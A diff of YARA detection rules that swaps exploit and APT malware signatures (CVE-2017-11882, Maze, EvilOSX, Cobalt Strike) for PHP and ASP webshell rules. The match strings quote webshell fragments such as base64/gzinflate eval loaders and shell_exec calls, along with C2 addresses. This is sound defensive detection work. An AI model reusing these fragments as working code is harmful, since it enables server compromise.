-		$package = { 50 61 63 6b 61 67 65 }
-		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{108}00/ ascii nocase
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		$s0
 }
-rule SIGNATURE_BASE_CVE_2017_11882_RTF : CVE_2017_11882 FILE
+rule SIGNATURE_BASE_Webshell_Remexp_Asp_Php
 {
 	meta:
-		description = "Detects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882"
+		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "400689ff-e856-5cbf-a7fa-93f6a8d8dbb9"
-		date = "2018-02-13"
-		modified = "2025-06-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L58-L80"
+		id = "274c8816-2711-5f12-937e-549ec2d57ce1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5572-L5587"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "729fa8215a24990371369158d4582cc0ba9387eb0e7221860bf7216046c447cb"
-		score = 60
+		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+		logic_hash = "b3cfa44898629ffa20630436ae10a94ad72f0e793d61e1157a4de649aa048fe2"
+		score = 75
 		quality = 85
-		tags = "CVE-2017-11882, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "4d534854412e4558452068747470"
-		$x2 = "6d736874612e6578652068747470"
-		$x3 = "6d736874612068747470"
-		$x4 = "4d534854412068747470"
-		$s1 = "4d6963726f736f6674204571756174696f6e20332e30" ascii
-		$s2 = "4500710075006100740069006f006e0020004e00610074006900760065" ascii
-		$s3 = "2e687461000000000000000000000000000000000000000000000"
+		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
 
 	condition:
-		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and filesize < 300KB and ( 1 of ( $x* ) or 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_EXP_Potential_CVE_2017_11882 : FILE
+rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "ReversingLabs"
-		id = "199710e0-5094-5940-ad29-f01383d5d8c2"
-		date = "2025-06-03"
-		modified = "2025-06-03"
-		reference = "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L82-L108"
+		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c83bb4ba-6b4e-5a88-925b-b93d08b304e4"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5588-L5604"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a6e91e5b9807c94d32bac8a21c2c009320d16830155aae129a7fc2c67d393141"
+		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+		logic_hash = "f93a5d87d4a490844de578067dc0b7bac6b01ceb9130cd7c70a227566e18f16c"
 		score = 75
-		quality = 60
-		tags = "FILE"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$docfilemagic = { D0 CF 11 E0 A1 B1 1A E1 }
-		$equation1 = "Equation Native" wide ascii
-		$equation2 = "Microsoft Equation 3.0" wide ascii
-		$mshta = "mshta"
-		$http = "http://"
-		$https = "https://"
-		$cmd = "cmd" fullword
-		$pwsh = "powershell"
-		$exe = ".exe"
-		$address = { 12 0C 43 00 }
-		$fp1 = "Tested with chamber evacuated to 1E-8 Torr on turbo pump" wide
-		$fp2 = "d(3z2-r2) to d(x2-y2) is not experimentally identified yet in cuprates" wide
-		$fp3 = "Preliminary results of MD simulation of Oxygen cluster infusion into Nb" wide
-		$fp4 = "The Mixing is linked to the coefficients p and q" ascii
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $docfilemagic at 0 and any of ( $mshta , $http , $https , $cmd , $pwsh , $exe ) and any of ( $equation1 , $equation2 ) and $address and not 1 of ( $fp* )
+		3 of them
 }
-rule SIGNATURE_BASE_Crime_Win32_Ransom_Maze_Dll_1 : FILE
+rule SIGNATURE_BASE_Webshell_Simattacker
 {
 	meta:
-		description = "Detects Maze ransomware payload dll unpacked"
-		author = "@VK_Intel"
-		id = "873aea2b-2dd4-5682-b979-35e73fbc189f"
-		date = "2020-04-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1251388507219726338"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_maze_ransomware.yar#L1-L17"
+		description = "PHP Webshells Github Archive - file simattacker.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2408fad8-780f-50de-a309-99d14a1d87b6"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5605-L5623"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b76636c05141687fa5cc507ac67d6a5d1f6c89166fd302e94fe61b412451159"
+		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+		logic_hash = "323b68f1d31df647775ad16a85b9f90bce4eac89188160a1e4853f8fec680160"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		tlp = "white"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = "Maze Ransomware" wide
-		$str2 = "--logging" wide
-		$str3 = "DECRYPT-FILES.txt" wide
-		$tick_server_call = { ff ?? ?? 8b ?? ?? ?? ?? ?? ff d6 8b ?? 89 f9 50 ff ?? ?? ff d6 8d ?? ?? ?? 89 ?? ?? ?? 56 e8 ?? ?? ?? ?? 83 c4 04 b9 67 66 66 66 89 c5 f7 e9 89 d0 d1 fa c1 e8 1f 01 c2 8d ?? ?? 29 c5 56 e8 ?? ?? ?? ?? 83 c4 04 b9 56 55 55 55 89 c6 f7 e9 89 f9 89 d0 c1 e8 1f 01 d0 8d ?? ?? 29 c6 8b ?? 55 56 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 89 ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 c5 50 ff d3 89 c6 ff ?? ?? ?? ff d3 8b ?? ?? ?? 01 f0 3d ff 03 00 00 0f ?? ?? ?? ?? ?? 55 ff ?? ?? ?? 68 a2 95 c3 00 53 ff ?? ?? ?? ?? ?? 83 c4 10 c6 ?? ?? ?? c6 ?? ?? ?? ?? }
+		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
+		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s20 = "$Comments=$_POST['Comments'];" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 3 of them ) or all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Sample_1
+rule SIGNATURE_BASE_Webshell_Dtool_Pro
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "PHP Webshells Github Archive - file DTool Pro.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "923de51a-8422-5318-95f5-79613d2d642e"
-		date = "2015-03-25"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L13-L28"
+		id = "9f2922d1-b2af-58ae-b194-ecb33577effa"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5624-L5642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
-		logic_hash = "9490715a2fc7d3c742771a8211bcfb4c0a0bafba4d5de8eee5825fdabaded6af"
-		score = 60
+		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+		logic_hash = "da744efb521415fb8817c0982d8d538e1e38b1c0995f43716611df37bf371c38"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Cannot execute (%d)" fullword ascii
-		$s16 = "SvcName" fullword ascii
+		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_1
+rule SIGNATURE_BASE_Webshell_Ironshell_4
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "PHP Webshells Github Archive - file ironshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "351f5ee5-c0ec-51b6-9953-2b64e3e74b09"
-		date = "2015-03-25"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L30-L60"
+		id = "06e87e02-372b-5d4e-be52-5515a068665b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_ironshell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5643-L5662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79879be4f49c8830573eb4a9f958ef9060413ea8b5dd3f8f3d5816e146d3a0b7"
-		score = 90
+		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+		logic_hash = "1810071f261ad7390532b07ef24115726f236131aa8ffd29adbde9ebe5085e9d"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
-		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
-		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
 
 	strings:
-		$x0 = "Users\\Wool3n.H4t\\"
-		$x1 = "C-CPP\\CWoolger"
-		$x2 = "NTSuser.exe" fullword wide
-		$s1 = "107.6.181.116" fullword wide
-		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
-		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
-		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
-		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
-		$s6 = "wlg.dat" fullword
-		$s7 = "woolger" fullword wide
-		$s8 = "[Enter]" fullword
-		$s9 = "[Control]" fullword
+		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+		$s16 = "if($_POST['chars'] == \"9999\")" fullword
+		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+		$s18 = "print shell_exec($command);" fullword
 
 	condition:
-		(1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) )
+		3 of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_2
+rule SIGNATURE_BASE_Webshell_Indexer_Asp_Php
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "930b928f-ff32-56b2-9e3c-dd80036ff7ef"
-		date = "2015-03-25"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L62-L79"
+		id = "d6e17429-1b58-5a1b-846d-f5dbfd74cf3a"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5663-L5679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "25d2ea25543b0a6330e443333f1ac7a59874631c8ee7faeb4ea6d94c62c255fc"
-		score = 90
+		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+		logic_hash = "c576925c95b5bd2549e8039a1fc6ac228bfab5ddee8c4e12264ea78e9828ba5c"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
-		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
-		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
-		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
 
 	strings:
-		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
+		$s7 = "var message=\"SaNaLTeRoR - " fullword
+		$s8 = "nDexEr - Reader\"" fullword
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_3
+rule SIGNATURE_BASE_Webshell_Toolaspshell
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "PHP Webshells Github Archive - file toolaspshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c227d24-624c-5fb5-a2ea-a971fda8bfba"
-		date = "2015-03-25"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L81-L111"
+		id = "016af030-4991-583c-aab5-a2933ae0eeec"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5680-L5693"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac51c25ad6ef6668238fef1de50517d48e6509f57cd6dd723595777ae16d8a6c"
-		score = 90
-		quality = 83
+		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+		logic_hash = "cb46d3170a9c144a22ef8c91b381495a471d2aa178a4a123eb9a1e32e1db7683"
+		score = 75
+		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
-		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
 
 	strings:
-		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
-		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
-		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
-		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
-		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
-		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
-		$s4 = "unable to load kernel32.dll" fullword ascii
-		$s5 = "index.php?c=%S&r=%x" fullword wide
-		$s6 = "%s len:%d " fullword ascii
-		$s7 = "Encountered error sending syscall response to client" fullword ascii
-		$s9 = "/info.dat" fullword ascii
-		$s10 = "Error entering thread lock" fullword ascii
-		$s11 = "Error exiting thread lock" fullword ascii
-		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
 
 	condition:
-		(1 of ( $x* ) ) or ( 8 of ( $s* ) )
+		2 of them
 }
-rule SIGNATURE_BASE_OSX_Backdoor_Evilosx : FILE
+rule SIGNATURE_BASE_Webshell_B374K_Mini_Shell_Php_Php
 {
 	meta:
-		description = "EvilOSX MacOS/OSX backdoor"
-		author = "John Lambert @JohnLaTwC"
-		id = "6940e355-53d2-51e3-afd0-13303a311e9a"
-		date = "2018-02-23"
-		modified = "2023-12-05"
-		reference = "https://github.com/Marten4n6/EvilOSX, https://twitter.com/JohnLaTwC/status/966139336436498432"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_evilosx.yar#L1-L34"
+		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5b0dfa5-46b5-5323-a8e8-b119d8c2c8e5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5694-L5707"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "89e5b8208daf85f549d9b7df8e2a062e47f15a5b08462a4224f73c0a6223972a"
-		logic_hash = "393abf7cf74f8d079049cf8f0bdb3a79bf16185c80c43b823e19b67a9031aef6"
+		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+		logic_hash = "553bd775d9662f9410d9ab946ccffe4b2ee92e367bcc6345fa595527653280cf"
 		score = 75
-		quality = 60
-		tags = "FILE"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "#!/usr/bin/env"
-		$s0 = "import base64" fullword ascii
-		$s1 = "b64decode" fullword ascii
-		$x0 = "EvilOSX" fullword ascii
-		$x1 = "get_launch_agent_directory" fullword ascii
-		$enc_x0 = /(AHYAaQBsAE8AUwBYA|dmlsT1NY|RQB2AGkAbABPAFMAWA|RXZpbE9TW|UAdgBpAGwATwBTAFgA|V2aWxPU1)/ ascii
-		$enc_x1 = /(AGUAdABfAGwAYQB1AG4AYwBoAF8AYQBnAGUAbgB0AF8AZABpAHIAZQBjAHQAbwByAHkA|cAZQB0AF8AbABhAHUAbgBjAGgAXwBhAGcAZQBuAHQAXwBkAGkAcgBlAGMAdABvAHIAeQ|dldF9sYXVuY2hfYWdlbnRfZGlyZWN0b3J5|Z2V0X2xhdW5jaF9hZ2VudF9kaXJlY3Rvcn|ZwBlAHQAXwBsAGEAdQBuAGMAaABfAGEAZwBlAG4AdABfAGQAaQByAGUAYwB0AG8AcgB5A|ZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9ye)/ ascii
+		$s0 = "@error_reporting(0);" fullword
+		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+		$s3 = "@set_time_limit(0); " fullword
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 30KB and all of ( $s* ) and 1 of ( $x* ) or 1 of ( $enc_x* )
+		all of them
 }
-rule SIGNATURE_BASE_APT_Nazar_Svchost_Commands
+rule SIGNATURE_BASE_Webshell_Sincap_1_0
 {
 	meta:
-		description = "Detects Nazar's svchost based on supported commands"
-		author = "Itay Cohen"
-		id = "3e02381d-de03-50c8-8bde-2974ee96b7c1"
-		date = "2020-04-26"
-		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/the-lost-nazar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nazar.yar#L1-L18"
+		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38d39739-660f-596d-a297-1f0dfe530797"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5708-L5723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c71e8a3b2d69c51ed3f822f62b90906fc0a21d32f1f1850cdef71c335964f9b1"
+		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+		logic_hash = "0cb8851285bd55b0b613ec4c46ab88142e2cbba7e527ad510b008cfb342af221"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
-		hash2 = "be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }
-		$str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }
-		$str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }
-		$str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }
-		$str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }
+		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
+		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
 
 	condition:
-		4 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Resources_Beacon_Dll_V3_8_1
+rule SIGNATURE_BASE_Webshell_B374K_Php
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
-		author = "gssincla@google.com"
-		id = "6c65cbf8-2c60-5315-b3b2-48dfcee75733"
-		date = "2022-11-18"
-		modified = "2023-12-05"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_cobaltstrike.yar#L1020-L1061"
+		description = "PHP Webshells Github Archive - file b374k.php.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "73eb7d8d-14bb-5bc2-90b2-90b6bd603bd1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5724-L5739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
-		logic_hash = "cde078a6ae7d0d835900e85498cf5ae20663ba8d5d3f912810e157261561e16a"
+		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+		logic_hash = "f44ecdcf327cf417a90a91c8d23f6137b80c2006bea2ca2e214f2bfdf5793771"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
-		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
-		$c2_1 = "ns7.softline.top" xor
-		$c2_2 = "ns8.softline.top" xor
-		$c2_3 = "ns9.softline.top" xor
+		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+		$s6 = "// password (default is: b374k)"
+		$s8 = "//******************************************************************************"
+		$s9 = "// b374k 2.2" fullword
+		$s10 = "eval(\"?>\".gzinflate(base64_decode("
 
 	condition:
-		$version_sig and $decoder and ( 2 of ( $c2_* ) or $xmrig_srcpath )
+		3 of them
 }
-rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Chinese_Keyboard_Layout
+rule SIGNATURE_BASE_Webshell_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend
 {
 	meta:
-		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Chinese keyboard layout"
+		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f901818b-5150-540f-b645-686c12784a38"
-		date = "2019-10-12"
-		modified = "2020-12-16"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/log_teamviewer_keyboard_layouts.yar#L2-L21"
+		id = "3e0bae7d-77a1-5439-bbe7-177bec23cea0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5740-L5757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba3bc7cbdfc5a47f6bc4cd9049c52eb95d25465af107ae3d068ef785b714279a"
-		score = 60
